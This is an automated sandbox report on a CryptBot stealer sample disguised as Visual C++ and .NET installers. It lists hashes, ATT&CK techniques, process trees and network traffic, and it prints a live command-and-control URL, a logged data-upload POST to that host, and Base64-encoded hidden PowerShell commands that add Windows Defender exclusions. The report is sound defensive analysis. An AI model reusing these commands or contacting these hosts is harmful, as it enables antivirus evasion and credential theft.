cryptbot | 96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad

Analysis

max time kernel
149s
max time network
139s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
10/02/2025, 05:41 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe
Size

3.8MB
MD5

39cb29174e8067eb57cb628d7debb3ec
SHA1

489a3762aff2b43e86f80f482162702fa7405588
SHA256

96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad
SHA512

6662cdaaff15575c7ea7094803b6ea3ac3258b78f6a26b0849d69ae82e1a6075092b605adb9ba02e92440515bdb4cf67343c6c74f685b8271090164a1797bba0
SSDEEP

98304:Zs/kiQvHYE7PyrHXIJ1zqRfm0zWPReVl2E:3iyYaH1q9z6eVlt

Score

10^/10

cryptbot defense_evasion discovery execution spyware stealer

Malware Config

Extracted

Family

cryptbot

http://home.elvnpp11sb.top/PbeokZpPUOamImAhVrmG11

Signatures

CryptBot
CryptBot is a C++ stealer distributed widely in bundle with other software.
spyware stealer cryptbot
Cryptbot family
cryptbot

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	VC_redist.x64.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
7604	powershell.exe
2932	powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
2360	VC_redist.x86.exe
7736	VC_redist.x64.exe
7916	Method.exe
6604	dotNetFx45_Full_setup.exe

Loads dropped DLL 10 IoCs

pid	Process
2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe
2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe
2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe
2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe
2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe
7884	taskeng.exe
2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe
2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe
2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe
2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral1/files/0x0009000000016d36-2635.dat	embeds_openssl

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VC_redist.x64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dotNetFx45_Full_setup.exe

Suspicious behavior: EnumeratesProcesses 49 IoCs

pid	Process
7604	powershell.exe
7736	VC_redist.x64.exe
7736	VC_redist.x64.exe
7736	VC_redist.x64.exe
7736	VC_redist.x64.exe
7736	VC_redist.x64.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
7916	Method.exe
2932	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2360	VC_redist.x86.exe
Token: SeDebugPrivilege	7604	powershell.exe
Token: SeDebugPrivilege	7916	Method.exe
Token: SeDebugPrivilege	6604	dotNetFx45_Full_setup.exe
Token: SeDebugPrivilege	2932	powershell.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 2336 wrote to memory of 2360	2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe	30
PID 2336 wrote to memory of 2360	2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe	30
PID 2336 wrote to memory of 2360	2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe	30
PID 2336 wrote to memory of 2360	2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe	30
PID 7572 wrote to memory of 7604	7572	taskeng.exe	35
PID 7572 wrote to memory of 7604	7572	taskeng.exe	35
PID 7572 wrote to memory of 7604	7572	taskeng.exe	35
PID 2336 wrote to memory of 7736	2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe	37
PID 2336 wrote to memory of 7736	2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe	37
PID 2336 wrote to memory of 7736	2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe	37
PID 2336 wrote to memory of 7736	2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe	37
PID 7884 wrote to memory of 7916	7884	taskeng.exe	39
PID 7884 wrote to memory of 7916	7884	taskeng.exe	39
PID 7884 wrote to memory of 7916	7884	taskeng.exe	39
PID 7916 wrote to memory of 7800	7916	Method.exe	40
PID 7916 wrote to memory of 7800	7916	Method.exe	40
PID 7916 wrote to memory of 7800	7916	Method.exe	40
PID 7916 wrote to memory of 7820	7916	Method.exe	41
PID 7916 wrote to memory of 7820	7916	Method.exe	41
PID 7916 wrote to memory of 7820	7916	Method.exe	41
PID 7916 wrote to memory of 7840	7916	Method.exe	42
PID 7916 wrote to memory of 7840	7916	Method.exe	42
PID 7916 wrote to memory of 7840	7916	Method.exe	42
PID 7916 wrote to memory of 7848	7916	Method.exe	43
PID 7916 wrote to memory of 7848	7916	Method.exe	43
PID 7916 wrote to memory of 7848	7916	Method.exe	43
PID 7916 wrote to memory of 7852	7916	Method.exe	44
PID 7916 wrote to memory of 7852	7916	Method.exe	44
PID 7916 wrote to memory of 7852	7916	Method.exe	44
PID 7916 wrote to memory of 7516	7916	Method.exe	45
PID 7916 wrote to memory of 7516	7916	Method.exe	45
PID 7916 wrote to memory of 7516	7916	Method.exe	45
PID 7916 wrote to memory of 7508	7916	Method.exe	46
PID 7916 wrote to memory of 7508	7916	Method.exe	46
PID 7916 wrote to memory of 7508	7916	Method.exe	46
PID 7916 wrote to memory of 7492	7916	Method.exe	47
PID 7916 wrote to memory of 7492	7916	Method.exe	47
PID 7916 wrote to memory of 7492	7916	Method.exe	47
PID 7916 wrote to memory of 7856	7916	Method.exe	48
PID 7916 wrote to memory of 7856	7916	Method.exe	48
PID 7916 wrote to memory of 7856	7916	Method.exe	48
PID 7916 wrote to memory of 7864	7916	Method.exe	49
PID 7916 wrote to memory of 7864	7916	Method.exe	49
PID 7916 wrote to memory of 7864	7916	Method.exe	49
PID 2336 wrote to memory of 6604	2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe	50
PID 2336 wrote to memory of 6604	2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe	50
PID 2336 wrote to memory of 6604	2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe	50
PID 2336 wrote to memory of 6604	2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe	50
PID 2336 wrote to memory of 6604	2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe	50
PID 2336 wrote to memory of 6604	2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe	50
PID 2336 wrote to memory of 6604	2336	96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe	50
PID 7572 wrote to memory of 2932	7572	taskeng.exe	52
PID 7572 wrote to memory of 2932	7572	taskeng.exe	52
PID 7572 wrote to memory of 2932	7572	taskeng.exe	52

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe
"C:\Users\Admin\AppData\Local\Temp\96bfc7cc6faec266f2d88ef07b0aa1557cdca954f9b1d00b382c049ce102c8ad.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2336
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2360
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe"
  2⤵
  - Enumerates VirtualBox registry keys
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:7736
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\dotNetFx45_Full_setup.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\dotNetFx45_Full_setup.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:6604

C:\Windows\system32\taskeng.exe
taskeng.exe {54F01064-98E2-44F0-849E-8B95DCFC6628} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:S4U:
1⤵
- Suspicious use of WriteProcessMemory
PID:7572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAUABlAHIAbQBpAHMAcwBpAG8AbgBTAGUAdABcAE0AZQB0AGgAbwBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAUABlAHIAbQBpAHMAcwBpAG8AbgBTAGUAdABcAE0AZQB0AGgAbwBkAC4AZQB4AGUA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:7604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAASQBkAC4AZQB4AGUAOwA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2932

C:\Windows\system32\taskeng.exe
taskeng.exe {3E6507A8-9ED8-4BC2-9F03-CA5F0FA108DD} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:7884
- C:\Users\Admin\AppData\Roaming\PermissionSet\Method.exe
  C:\Users\Admin\AppData\Roaming\PermissionSet\Method.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:7916
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    3⤵
    PID:7800
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    3⤵
    PID:7820
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    3⤵
    PID:7840
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    3⤵
    PID:7848
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    3⤵
    PID:7852
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    3⤵
    PID:7516
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    3⤵
    PID:7508
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    3⤵
    PID:7492
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    3⤵
    PID:7856
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    3⤵
    PID:7864

Network

DNS

httpbin.org

VC_redist.x64.exe

Remote address:

8.8.8.8:53

Request

httpbin.org

IN A

Response
DNS

httpbin.org

VC_redist.x64.exe

Remote address:

8.8.8.8:53

Request

httpbin.org

IN AAAA

Response

httpbin.org

IN A

3.211.25.71

httpbin.org

IN A

3.230.67.98
DNS

home.elvnpp11sb.top

VC_redist.x64.exe

Remote address:

8.8.8.8:53

Request

home.elvnpp11sb.top

IN A

Response
DNS

home.elvnpp11sb.top

VC_redist.x64.exe

Remote address:

8.8.8.8:53

Request

home.elvnpp11sb.top

IN AAAA

Response

home.elvnpp11sb.top

IN A

188.130.207.189
DNS

my-plugs.s3.eu-central-003.backblazeb2.com

Method.exe

Remote address:

8.8.8.8:53

Request

my-plugs.s3.eu-central-003.backblazeb2.com

IN A
DNS

my-plugs.s3.eu-central-003.backblazeb2.com

Method.exe

Remote address:

8.8.8.8:53

Request

my-plugs.s3.eu-central-003.backblazeb2.com

IN A
DNS

my-plugs.s3.eu-central-003.backblazeb2.com

Method.exe

Remote address:

8.8.8.8:53

Request

my-plugs.s3.eu-central-003.backblazeb2.com

IN A
DNS

my-plugs.s3.eu-central-003.backblazeb2.com

Method.exe

Remote address:

8.8.8.8:53

Request

my-plugs.s3.eu-central-003.backblazeb2.com

IN A
DNS

my-plugs.s3.eu-central-003.backblazeb2.com

Method.exe

Remote address:

8.8.8.8:53

Request

my-plugs.s3.eu-central-003.backblazeb2.com

IN A
DNS

home.elvnpp11sb.top

VC_redist.x64.exe

Remote address:

8.8.8.8:53

Request

home.elvnpp11sb.top

IN A

Response

home.elvnpp11sb.top

IN A

188.130.207.189
DNS

home.elvnpp11sb.top

VC_redist.x64.exe

Remote address:

8.8.8.8:53

Request

home.elvnpp11sb.top

IN AAAA

Response
POST

http://home.elvnpp11sb.top/PbeokZpPUOamImAhVrmG1739003311

VC_redist.x64.exe

Remote address:

188.130.207.189:80

Request

POST /PbeokZpPUOamImAhVrmG1739003311 HTTP/1.1
Host: home.elvnpp11sb.top
Accept: */*
Content-Type: application/json
Content-Length: 417090

Response

HTTP/1.1 504 Gateway Time-out

content-length: 92
cache-control: no-cache
content-type: text/html
connection: close
DNS

home.elvnpp11sb.top

VC_redist.x64.exe

Remote address:

8.8.8.8:53

Request

home.elvnpp11sb.top

IN A

Response

home.elvnpp11sb.top

IN A

188.130.207.189
DNS

home.elvnpp11sb.top

VC_redist.x64.exe

Remote address:

8.8.8.8:53

Request

home.elvnpp11sb.top

IN AAAA

Response
DNS

home.elvnpp11sb.top

VC_redist.x64.exe

Remote address:

8.8.8.8:53

Request

home.elvnpp11sb.top

IN A
DNS

home.elvnpp11sb.top

VC_redist.x64.exe

Remote address:

8.8.8.8:53

Request

home.elvnpp11sb.top

IN AAAA
POST

http://home.elvnpp11sb.top/PbeokZpPUOamImAhVrmG1739003311

VC_redist.x64.exe

Remote address:

188.130.207.189:80

Request

POST /PbeokZpPUOamImAhVrmG1739003311 HTTP/1.1
Host: home.elvnpp11sb.top
Accept: */*
Content-Type: application/json
Content-Length: 128

Response

HTTP/1.1 404 NOT FOUND

server: nginx/1.22.1
date: Mon, 10 Feb 2025 05:44:17 GMT
content-type: text/html; charset=utf-8
content-length: 207

3.211.25.71:443

httpbin.org

tls

VC_redist.x64.exe

2.0kB
6.5kB
19
15
188.130.207.189:80

home.elvnpp11sb.top

VC_redist.x64.exe

152 B
3
185.196.9.156:39001

Method.exe

942 B
660 B
12
6
188.130.207.189:80

http://home.elvnpp11sb.top/PbeokZpPUOamImAhVrmG1739003311

http

VC_redist.x64.exe

60.3kB
954 B
47
17

HTTP Request

POST http://home.elvnpp11sb.top/PbeokZpPUOamImAhVrmG1739003311

HTTP Response

504
188.130.207.189:80

http://home.elvnpp11sb.top/PbeokZpPUOamImAhVrmG1739003311

http

VC_redist.x64.exe

690 B
605 B
9
6

HTTP Request

POST http://home.elvnpp11sb.top/PbeokZpPUOamImAhVrmG1739003311

HTTP Response

404

8.8.8.8:53

httpbin.org

dns

VC_redist.x64.exe

160 B
250 B
2
2

DNS Request

httpbin.org

DNS Request

httpbin.org

DNS Response

3.211.25.71

3.230.67.98
8.8.8.8:53

home.elvnpp11sb.top

dns

VC_redist.x64.exe

176 B
228 B
2
2

DNS Request

home.elvnpp11sb.top

DNS Request

home.elvnpp11sb.top

DNS Response

188.130.207.189
8.8.8.8:53

my-plugs.s3.eu-central-003.backblazeb2.com

dns

Method.exe

440 B
5

DNS Request

my-plugs.s3.eu-central-003.backblazeb2.com

DNS Request

my-plugs.s3.eu-central-003.backblazeb2.com

DNS Request

my-plugs.s3.eu-central-003.backblazeb2.com

DNS Request

my-plugs.s3.eu-central-003.backblazeb2.com

DNS Request

my-plugs.s3.eu-central-003.backblazeb2.com
8.8.8.8:53

home.elvnpp11sb.top

dns

VC_redist.x64.exe

176 B
228 B
2
2

DNS Request

home.elvnpp11sb.top

DNS Request

home.elvnpp11sb.top

DNS Response

188.130.207.189
8.8.8.8:53

home.elvnpp11sb.top

dns

VC_redist.x64.exe

352 B
228 B
4
2

DNS Request

home.elvnpp11sb.top

DNS Request

home.elvnpp11sb.top

DNS Request

home.elvnpp11sb.top

DNS Request

home.elvnpp11sb.top

DNS Response

188.130.207.189

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
dec3af561112863423a1d7f6f732d525

SHA1
5998af044f5f2064dc4ad343423f2d03bb24c983

SHA256
f83aa20003be15c69bc6e323aabf54bea8b03d280aef130cb6c71150c0dabcb1

SHA512
f94ecc541a4a1d4cf8cd9b55d64ab3b0aa3c0b7ee936a92c69b7fe94f04f061a89766ca25f53dd670e8bbc435538a685fb376647a1a244ad8a0fb39f0929f567

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QZQVDZ0IV01PJC0DVOPB.temp

Filesize
7KB

MD5
e9cb99c337eca5a4814b48c64832d767

SHA1
6e4fe4ac83d78650fb8226b8629d6ec5bfe1046b

SHA256
cc4c398081855407491edc5da10e0e44cd669587f135de007b94a1daca6f8d2b

SHA512
bf244754a260fbd1526d8a53bf1263b02cbc453f4c255ce40dc5c798be1a09755de5040b89051999f9707ed29ba8c39d331a13e914dfc5cdda34cd50f4a1a3db

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe

Filesize
8.5MB

MD5
f1d1d8dc0494c69f77e03f6b5366a2a4

SHA1
2f20af746b4e69db58c3c0383365ba9da7c6bf26

SHA256
11c9dd0e206ed62d39c85600cda77706e91691b3b6557746a916c0bbe5a60721

SHA512
df0c70cb54faef30891da8fb7c8e9e877adbe004ee2348d780131586113d50e3d8ed2966538a69dcdeb5f14f689fb53f913a0747062241813d3b0ad1a064da04

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe

Filesize
626KB

MD5
abab3febb6ef9c10eb9ecdbebbbc128c

SHA1
cda81cd8994098f779de7e1510049daf667fb844

SHA256
7614eb6c0d335ac226aec01e855d50c683d9b18529dfc066e51b3163c5f54f3d

SHA512
855993982c0660f85ac53defd959f56d912897b5f67afb673dfbf4c1b984abf81ba198ed22553c2aa94f239bcd40e45f7400a7c8c87e79f316f7496cd231db9c

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\dotNetFx45_Full_setup.exe

Filesize
544KB

MD5
1336375cf1aaa4efdad95d0b64ea1aac

SHA1
9be80a505aa2dfcc4db73c8e5264ed5867533e66

SHA256
04d68438f75065f5c2997e80a317b1c6fad78d723af585a64d39138861055ec6

SHA512
12d91fefeb431b60b2501f7868e25dfa04eb42f94bd630b21fef4f3cd6ae5962b6764215da77824e06c53ae8d5d446b322936406396aaa178c71edf24b765f48

Download Submit
memory/2360-43-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-65-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-19-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-17-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-16-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-71-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-79-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-77-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-75-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-73-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-69-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-67-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-37-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-63-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-61-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-60-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-55-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-53-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-49-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-47-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-57-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-52-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-45-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-23-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-21-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-12-0x000007FEF5993000-0x000007FEF5994000-memory.dmp

Filesize
4KB

Download
memory/2360-41-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-35-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-33-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-2620-0x0000000000690000-0x00000000006E6000-memory.dmp

Filesize
344KB

Download
memory/2360-2621-0x0000000000920000-0x000000000096C000-memory.dmp

Filesize
304KB

Download
memory/2360-31-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-29-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-27-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-25-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2360-2622-0x0000000000A80000-0x0000000000AD4000-memory.dmp

Filesize
336KB

Download
memory/2360-13-0x0000000000AD0000-0x0000000000B72000-memory.dmp

Filesize
648KB

Download
memory/2360-2628-0x000007FEF5993000-0x000007FEF5994000-memory.dmp

Filesize
4KB

Download
memory/2360-14-0x000000001B320000-0x000000001B418000-memory.dmp

Filesize
992KB

Download
memory/2360-2630-0x000007FEF5990000-0x000007FEF637C000-memory.dmp

Filesize
9.9MB

Download
memory/2360-2633-0x000007FEF5990000-0x000007FEF637C000-memory.dmp

Filesize
9.9MB

Download
memory/2360-15-0x000007FEF5990000-0x000007FEF637C000-memory.dmp

Filesize
9.9MB

Download
memory/2360-39-0x000000001B320000-0x000000001B413000-memory.dmp

Filesize
972KB

Download
memory/2932-7172-0x000000001A0A0000-0x000000001A382000-memory.dmp

Filesize
2.9MB

Download
memory/2932-7173-0x0000000000C60000-0x0000000000C68000-memory.dmp

Filesize
32KB

Download
memory/6604-5284-0x0000000000320000-0x00000000003AE000-memory.dmp

Filesize
568KB

Download
